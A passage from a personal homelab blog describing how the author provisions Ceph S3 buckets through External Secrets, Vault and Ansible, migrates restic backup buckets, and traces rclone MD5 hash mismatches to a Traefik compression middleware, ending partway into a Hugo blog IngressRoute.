<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PushSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">s3-my-user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">deletionPolicy</span>: <span style="color:#ae81ff">Delete</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#ae81ff">30m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRefs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-vault-store</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">secret</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>:  <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-my-user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">match</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">remoteKey</span>: <span style="color:#ae81ff">secret/my_kubernetes_secrets/cluster/s3/users/my-user</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">property</span>: <span style="color:#ae81ff">access</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">match</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">remoteKey</span>: <span style="color:#ae81ff">secret/my_kubernetes_secrets/cluster/s3/users/my-user</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">property</span>: <span style="color:#ae81ff">secret</span>
</span></span></code></pre></div><p>Here again, for security reasons, the PushSecret needs to be in the same
namespace as the Secret it is pushing out to the provider. The <code>deletionPolicy</code>
defines what happens when the PushSecret is deleted. With <code>Delete</code>, the secret
in the secret store will also be removed. With <code>Retain</code>, the secret will be kept.</p>
<p>The <code>selector</code> selects the secret to be pushed, while <code>data:</code> defines what
actually gets pushed. With the config here and considering the Secret format
for S3 credentials created by Rook I showed above, the secret in Vault would
have the following format:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;request_id&#34;</span>: <span style="color:#e6db74">&#34;foo&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;lease_id&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;lease_duration&#34;</span>: <span style="color:#ae81ff">2764800</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;renewable&#34;</span>: <span style="color:#66d9ef">false</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;data&#34;</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;access&#34;</span>: <span style="color:#e6db74">&#34;ABCDE&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;custom_metadata&#34;</span>: {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;managed-by&#34;</span>: <span style="color:#e6db74">&#34;external-secrets&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;secret&#34;</span>: <span style="color:#e6db74">&#34;FGHIJ&#34;</span>
</span></span><span style="display:flex;"><span>  },
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;warnings&#34;</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I&rsquo;m not pushing the <code>Endpoint</code> from the original secret, as that&rsquo;s not going to
change.</p>
<p>And this is part two done, the S3 credentials are now available to Ansible via
Vault. Now the final part, actually creating the buckets.</p>
<p>I&rsquo;m using Ansible&rsquo;s <a href="https://docs.ansible.com/ansible/latest/collections/amazon/aws/s3_bucket_module.html">s3_bucket</a>
module to create my buckets. Compared to using Rook&rsquo;s OBC, this also allows me
add a policy. Here is an example play:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">command_and_control_host</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Play for creating the my-bucket bucket</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">example</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_access</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;hashi_vault&#39;, &#39;secret=secret/my_kubernetes_secrets/cluster/s3/users/my-user:access token=&#39;+vault_token+&#39; url=&#39;+vault_url) }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_secret</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;hashi_vault&#39;, &#39;secret=secret/my_kubernetes_secrets/cluster/s3/users/my-user:secret token=&#39;+vault_token+&#39; url=&#39;+vault_url) }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Create my-bucket bucket</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">example</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">amazon.aws.s3_bucket</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-bucket</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">access_key</span>: <span style="color:#e6db74">&#34;{{ s3_access }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secret_key</span>: <span style="color:#e6db74">&#34;{{ s3_secret }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">ceph</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">endpoint_url</span>: <span style="color:#ae81ff">https://s3.example.com</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">policy</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;file&#39;,&#39;bucket-policies/my-bucket.json&#39;) }}&#34;</span>
</span></span></code></pre></div><p>I&rsquo;m reading the access ID and secret key for S3 access from Vault into Ansible
variables because I&rsquo;ve got a single &ldquo;s3-buckets&rdquo; playbook, creating different
buckets with different users, so using the <code>AWS_*</code> env variables doesn&rsquo;t work.
The example will create a bucket with the credentials of the <code>my-user</code> user,
called <code>my-bucket</code> on the Ceph S3 server reachable via <code>s3.example.com</code>.
The <code>policy</code> option only accepts a JSON string, not a filename, hence the use
of the <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/file_lookup.html">file lookup</a>.
A policy for a bucket with public read, like the ones I&rsquo;m using for my docs,
would look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Version&#34;</span>: <span style="color:#e6db74">&#34;2012-10-17&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Statement&#34;</span>: [
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;s3:ListBucket&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;s3:GetBucketLocation&#34;</span>
</span></span><span style="display:flex;"><span>            ],
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;arn:aws:s3:::my-bucket&#34;</span>
</span></span><span style="display:flex;"><span>            ],
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>                    <span style="color:#e6db74">&#34;*&#34;</span>
</span></span><span style="display:flex;"><span>                ]
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;s3:GetObject&#34;</span>
</span></span><span style="display:flex;"><span>            ],
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;arn:aws:s3:::my-bucket/*&#34;</span>
</span></span><span style="display:flex;"><span>            ],
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>                    <span style="color:#e6db74">&#34;*&#34;</span>
</span></span><span style="display:flex;"><span>                ]
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>So that&rsquo;s it. With three steps, I&rsquo;ve created a bucket with a policy, and all of
it is under version control. I only need to remember the following three
commands:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e"># Deploy the User manifest to k8s</span>
</span></span><span style="display:flex;"><span>kubectl apply -f my-user-manifest.yaml
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Deploy the PushSecret manifest to k8s</span>
</span></span><span style="display:flex;"><span>kubectl apply -f my-push-secret-manifest.yaml
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Run the Ansible playbook</span>
</span></span><span style="display:flex;"><span>ansible-playbook s3-buckets.yaml
</span></span></code></pre></div><p>Besides some filenames, they&rsquo;re going to be the same regardless of which bucket
I&rsquo;m creating. Way nicer than having to remember the <code>radosgw-admin</code>, <code>mc</code> MinIO
client, <code>vault</code> and <code>s3cmd</code> incantations I showed in the previous section.</p>
<h1 id="migrating-backup-buckets">Migrating backup buckets</h1>
<p>So let&rsquo;s get to actually migrating some buckets. The first set I worked on were
the S3 buckets for my backups. I will keep the description of the actual backup
procedure short - first, this isn&rsquo;t an article about backups, and second, mine
has so many warts that I&rsquo;m a bit embarrassed. &#x1f609;</p>
<p>My backups currently have two stages. First, I&rsquo;m using <a href="https://restic.net/">restic</a>
to back up the volumes of all of my services. There&rsquo;s one bucket per service,
and the backup runs nightly. In addition, I&rsquo;m backing up my <code>/home</code> on my desktop
and laptop. The second stage is backing up all of those buckets onto an external
HDD connected to one of my nodes, using <a href="https://rclone.org/">rclone</a>.</p>
<p>The only &ldquo;special&rdquo; thing about these backup buckets is that they need access for
more than one user. There&rsquo;s the restic backup user running the per-service
backups. This user needs read and write access to every bucket. Then there&rsquo;s the
external backup user, which only needs read access to the backups.
The S3 bucket policy for those buckets looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Version&#34;</span>: <span style="color:#e6db74">&#34;2012-10-17&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Statement&#34;</span>: [
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:DeleteObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:PutObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:ListBucket&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetBucketLocation&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::srv-name/*&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::srv-name&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;arn:aws:iam:::user/service-backup-user&#34;</span>
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:ListBucket&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetBucketLocation&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::srv-name/*&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::srv-name&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;arn:aws:iam:::user/external-backup-user&#34;</span>
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This policy is of course specific to my setup with restic and rclone. Other
S3-capable backup tools might need additional or fewer permissions on the
buckets.</p>
<p>I then just copied the buckets from the old cluster to the new cluster:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>mc cp -a --recursive old-cluster-alias/my-bucket/ new-cluster-alias/my-bucket/
</span></span></code></pre></div><p>I will show a couple of metrics on the transfer speeds and so on in the later
<a href="#metrics">Metrics section</a>.</p>
<h2 id="problems-with-mismatches-between-files-and-their-hashes">Problems with mismatches between files and their hashes</h2>
<p>During the migration of my backup buckets, I hit a pretty frustrating problem
which cost me a lot of time analyze. During the copying of the buckets with
<code>mc</code> as well as during the initial services backup run with restic, everything
looked fine.
Then I migrated over the external disk backup, and rclone suddenly started
throwing errors like this:</p>
<pre tabindex="0"><code>&#34;Failed to sync with 4 errors: last error was: corrupted on transfer: md5 hash differ \&#34;95110ecafcd3c5f37c29fa9dd8157cce\&#34; vs \&#34;fe25b63800d5d9cab3174297fc8480ce\&#34;&#34;
&#34;ERROR : Attempt 3/3 failed with 4 errors and: corrupted on transfer: md5 hash differ \&#34;95110ecafcd3c5f37c29fa9dd8157cce\&#34; vs \&#34;fe25b63800d5d9cab3174297fc8480ce\&#34;&#34;
&#34;ERROR : Local file system at /hn-data/usb-mount/buckets/backup-mail: not deleting directories as there were IO errors&#34;
&#34;ERROR : Local file system at /hn-data/usb-mount/buckets/backup-mail: not deleting files as there were IO errors&#34;
&#34;ERROR : data/9e/9ea8a2f41ef73cb02ea0c4076c907210f814c26d92d22a5e59fafa1821c1f356.xabetij7.partial: corrupted on transfer: md5 hash differ \&#34;95110ecafcd3c5f37c29fa9dd8157cce\&#34; vs \&#34;fe25b63800d5d9cab3174297fc8480ce\&#34;&#34;
&#34;ERROR : data/51/519f791addd43bbb94b9edc9b0bf1bb7608a0736fd76b97fa126867b7aa5acc2.homotep1.partial: corrupted on transfer: md5 hash differ \&#34;0508dafb993525a6579d84cb8172c954\&#34; vs \&#34;24533a2effbf7d84b799d811f14e1dd3\&#34;&#34;
&#34;ERROR : data/4a/4afea197e24fb5136beae05e5f86003cebf37e9b0d8cc020248307727c9fef93.gusidof8.partial: corrupted on transfer: md5 hash differ \&#34;647135d3de83dd64e398026c6cc8a1dd\&#34; vs \&#34;9eb1ded016386b727c35b29df58afe80\&#34;&#34;
&#34;ERROR : data/dd/dd6c50ae7e5b26aede0726128dc2d0f113dc896ffcabadd78b0e44bdd48226f8.hagoqic7.partial: corrupted on transfer: md5 hash differ \&#34;778f53d5a2987ebc060a9fce0b476613\&#34; vs \&#34;a7b482f2a64b634558587dc3f3518c39\&#34;&#34;
&#34;ERROR : Attempt 2/3 failed with 4 errors and: corrupted on transfer: md5 hash differ \&#34;95110ecafcd3c5f37c29fa9dd8157cce\&#34; vs \&#34;fe25b63800d5d9cab3174297fc8480ce\&#34;&#34;
&#34;ERROR : Local file system at /hn-data/usb-mount/buckets/backup-mail: not deleting directories as there were IO errors&#34;
&#34;ERROR : Local file system at /hn-data/usb-mount/buckets/backup-mail: not deleting files as there were IO errors&#34;
&#34;ERROR : data/9e/9ea8a2f41ef73cb02ea0c4076c907210f814c26d92d22a5e59fafa1821c1f356.rewijes9.partial: corrupted on transfer: md5 hash differ \&#34;95110ecafcd3c5f37c29fa9dd8157cce\&#34; vs \&#34;fe25b63800d5d9cab3174297fc8480ce\&#34;&#34;
&#34;ERROR : data/dd/dd6c50ae7e5b26aede0726128dc2d0f113dc896ffcabadd78b0e44bdd48226f8.sixuwuf0.partial: corrupted on transfer: md5 hash differ \&#34;778f53d5a2987ebc060a9fce0b476613\&#34; vs \&#34;a7b482f2a64b634558587dc3f3518c39\&#34;&#34;
&#34;ERROR : data/4a/4afea197e24fb5136beae05e5f86003cebf37e9b0d8cc020248307727c9fef93.filorut1.partial: corrupted on transfer: md5 hash differ \&#34;647135d3de83dd64e398026c6cc8a1dd\&#34; vs \&#34;9eb1ded016386b727c35b29df58afe80\&#34;&#34;
&#34;ERROR : data/51/519f791addd43bbb94b9edc9b0bf1bb7608a0736fd76b97fa126867b7aa5acc2.doyahiy9.partial: corrupted on transfer: md5 hash differ \&#34;0508dafb993525a6579d84cb8172c954\&#34; vs \&#34;24533a2effbf7d84b799d811f14e1dd3\&#34;&#34;
&#34;ERROR : Attempt 1/3 failed with 4 errors and: corrupted on transfer: md5 hash differ \&#34;95110ecafcd3c5f37c29fa9dd8157cce\&#34; vs \&#34;fe25b63800d5d9cab3174297fc8480ce\&#34;&#34;
&#34;ERROR : Local file system at /hn-data/usb-mount/buckets/backup-mail: not deleting directories as there were IO errors&#34;
&#34;ERROR : Local file system at /hn-data/usb-mount/buckets/backup-mail: not deleting files as there were IO errors&#34;
&#34;ERROR : data/9e/9ea8a2f41ef73cb02ea0c4076c907210f814c26d92d22a5e59fafa1821c1f356.sosepip8.partial: corrupted on transfer: md5 hash differ \&#34;95110ecafcd3c5f37c29fa9dd8157cce\&#34; vs \&#34;fe25b63800d5d9cab3174297fc8480ce\&#34;&#34;
&#34;ERROR : data/dd/dd6c50ae7e5b26aede0726128dc2d0f113dc896ffcabadd78b0e44bdd48226f8.dalatiy1.partial: corrupted on transfer: md5 hash differ \&#34;778f53d5a2987ebc060a9fce0b476613\&#34; vs \&#34;a7b482f2a64b634558587dc3f3518c39\&#34;&#34;
&#34;ERROR : data/4a/4afea197e24fb5136beae05e5f86003cebf37e9b0d8cc020248307727c9fef93.midizaw6.partial: corrupted on transfer: md5 hash differ \&#34;647135d3de83dd64e398026c6cc8a1dd\&#34; vs \&#34;9eb1ded016386b727c35b29df58afe80\&#34;&#34;
&#34;ERROR : data/51/519f791addd43bbb94b9edc9b0bf1bb7608a0736fd76b97fa126867b7aa5acc2.vonupuf0.partial: corrupted on transfer: md5 hash differ \&#34;0508dafb993525a6579d84cb8172c954\&#34; vs \&#34;24533a2effbf7d84b799d811f14e1dd3\&#34;&#34;
&#34;NOTICE: data/4a/4afea197e24fb5136beae05e5f86003cebf37e9b0d8cc020248307727c9fef93: Not decompressing &#39;Content-Encoding: gzip&#39; compressed file. Use --s3-decompress to override&#34;
</code></pre><p>The first thing to note here is that the error did not appear for every file, nor
did these errors show up for every bucket. The above example comes from a very
small 350KB bucket with 15 files total. I never saw this same error for my 50GB
<code>/home</code> backup bucket.</p>
<p>After some false starts, I was at least able to verify that the error was right,
the MD5 sum (also called &ldquo;ETag&rdquo; e.g. in the <code>mc stat</code> output) did not fit the
file. I had no idea what&rsquo;s going wrong. My next test was to create a completely
new copy of one of the buckets, without running a service backup job against it,
to see whether it was restic that corrupted the bucket. But the errors showed
up immediately after syncing. I was also able to reproduce them by doing a local
<code>rclone sync new-ceph-alias:backup-mail</code> on my desktop, so it wasn&rsquo;t some weird
quirk of my backup jobs either.</p>
<p>For checking the checksum of a file in an S3 bucket, I used s3cmd like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>s3cmd -c ~/.s3cmd-conf-file info s3://backup-mail/filename
</span></span></code></pre></div><p>The output might look like this:</p>
<pre tabindex="0"><code>s3://backup-mail/filename (object):
   File size: 2512
   Last mod:  Wed, 17 Jan 2024 22:31:15 GMT
   MIME type: application/octet-stream
   Storage:   STANDARD
   MD5 sum:   9eacc1551b0e80f38f77443aa33dc0d1
   SSE:       none
</code></pre><p>That was about the point where I got really nervous - were my backups corrupted
without me noticing? So I ran restic&rsquo;s <code>check</code> command on both, the new and
the old buckets:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>restic repair index -r s3:s3.example.com/backup-mail
</span></span></code></pre></div><p>This command came back with &ldquo;no errors&rdquo; on both the old and the new buckets.</p>
<p>I also got pointed in the completely wrong direction once, because I called this
command on one of the problematic files:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>rclone check --download rooks3:backup-mail/my-dir/ cephs3:backup-mail/data/dd/
</span></span><span style="display:flex;"><span>2024/01/18 22:40:53 NOTICE: S3 bucket backup-mail path my-dir: <span style="color:#ae81ff">0</span> differences found
</span></span><span style="display:flex;"><span>2024/01/18 22:40:53 NOTICE: S3 bucket backup-mail path my-dir: <span style="color:#ae81ff">1</span> matching files
</span></span></code></pre></div><p>So, the files were supposedly matching. For now, I was
convinced that the files themselves were perfectly fine, and there was just
something wrong with the MD5 sums.
After some further digging, I found out that restic uses the MinIO client lib
as their S3 backend. And I had also used MinIO&rsquo;s <code>mc</code> client to do the
bucket-to-bucket copying. So I thought: Okay, there&rsquo;s definitely a bug in
MinIO&rsquo;s client lib! Hurray, progress! I was able to confirm this by using
<code>rclone sync</code> to do the bucket-to-bucket copy, and subsequent <code>rclone sync</code> to
local did not fail. But then I got the same <code>rclone sync</code> errors again after
I had run the first restic backup against the new buckets.</p>
<p>This in turn lead me to believe that there was something wrong with restic. But
I couldn&rsquo;t find anything at all on the Internet. It seemed I was the only person
seeing this error. I then updated all my restics, rclones and <code>mc</code>s to the newest
versions.</p>
<p>No dice, still the same error. That was when I started doubting the Ceph Rook
setup and questioning the entire Kubernetes migration.</p>
<p>And then, I a state of utter frustration, I ran the <code>rclone sync</code> again. And
this time, I looked at the actual errors more closely. And for the first time
in this multi-day investigation really perceived this line:</p>
<pre tabindex="0"><code>my-file: Not decompressing &#39;Content-Encoding: gzip&#39; compressed file. Use --s3-decompress to override
</code></pre><p>And it hit me like a brick. I&rsquo;m pretty sure I woke up my neighbors with the
facepalm I did. It was my Traefik config. I had enabled the <a href="https://doc.traefik.io/traefik/middlewares/http/compress/">Compression Middleware</a>.
And in my Ceph Rook setup, in contrast to my baremetal setup, Ceph S3 was only
reachable through my Traefik ingress.
After disabling the compression middleware, no MD5 sum problems occurred.</p>
<p>I have to admit that at this point, the story pretty much ends. I have no complete
explanation of what might be going on here. The error message above suggests
that a compressed file reached the S3 bucket and got stored there - but that
doesn&rsquo;t really make much sense, because the compression middleware only handles
responses, it doesn&rsquo;t touch the requests, from what I see in the docs at least.</p>
<p>If anybody has a theory or even better, an actual explanation, I would very
much love to hear it, e.g. via <a href="https://social.mei-home.net/@mmeier">the Fediverse</a>.</p>
<h1 id="migrating-my-hugo-blog-and-wiki">Migrating my Hugo blog and wiki</h1>
<p>Another pair of migrations which might be interesting to some of you were my
blog and my internal docs. Both run on <a href="https://gohugo.io/">Hugo</a>. One of these
days I will actually get around to writing the obligatory &ldquo;How I&rsquo;m running this
blog&rdquo; post, but that day is not (really) today. &#x1f601;</p>
<p>In short, Hugo is a static site generator, fed with Markdown files. I generate
the files in my CI and then push them into an S3 bucket. That bucket is then
directly served via my Traefik proxy.</p>
<p>I&rsquo;m running both, the blog and wiki, via my Traefik ingress in the new k8s
setup. The IngressRoute manifest for the blog is the more interesting one:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">IngressRoute</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">blog</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#e6db74">&#34;blog.mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/target</span>: <span style="color:#e6db74">&#34;some-host.none-of-your-bussiness&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">dmz</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">routes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Rule</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">match</span>: <span style="color:#ae81ff">Host(`blog.mei-home.net`)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">middlewares</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">blog-index</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">blog</span>
